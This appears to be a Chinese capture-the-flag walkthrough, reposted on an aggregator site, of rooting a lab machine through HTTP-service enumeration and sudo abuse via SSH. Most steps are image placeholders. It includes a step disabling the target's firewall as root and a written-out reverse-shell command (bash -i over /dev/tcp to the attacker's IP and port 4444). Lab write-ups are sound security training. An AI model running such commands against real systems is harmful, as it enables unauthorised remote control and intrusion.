CTF--HTTP服务--命令执行

Posted joker-vip

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CTF--HTTP服务--命令执行相关的知识,希望对你有一定的参考价值。

开门见山


 

1. 扫描靶机ip,发现PCS 172.18.5.1

 技术图片

 

 

2. 用nmap扫描靶机开放服务和服务版本

 技术图片

 

 

3. 再扫描靶机全部信息

 技术图片

 

 技术图片

 

 

4. 用nikto工具扫描http服务的敏感信息

 技术图片

 

 

5. 打开浏览器查看发现的网页

 技术图片

 

 

6. 查看临时缓冲目录

 技术图片

 

 

7. 查看home目录,挖掘用户信息

 技术图片

 

 

8. 查看具体用户的目录

 技术图片

 

 

9. 查看靶机的信息

 技术图片

 

 

10. 利用ssh命令,执行root权限命令

 技术图片

 

 

11. 用bill执行root权限关闭防火墙

 技术图片

 

 

12. 攻击机启动监听

 技术图片

 

 

 

13. 靶机反弹shell,使用命令:ssh bill@localhost sudo bash -i >& /dev/tcp/172.18.5.251/4444 0>& 1

 技术图片

 

 

14. 攻击机终端收到反馈shell

 技术图片

 

 

15. 还有一种shell反弹

 技术图片

 

 

16. 在 /root目录下查找flag文件并查看

 技术图片

 

 


 

以上是关于CTF--HTTP服务--命令执行的主要内容,如果未能解决你的问题,请参考以下文章

命令行登录FTP下,如何远程执行服务器上的可执行文件?不是在本机执行,而是远程执行,命令是啥呢。求高

ssh远程连接服务器执行命令

Linux 不同服务器 执行不同命令

shell实现交互式在多台服务器批量执行命令

shell中怎么批量执行命令。

本地shell脚本中ssh到远程服务器并执行命令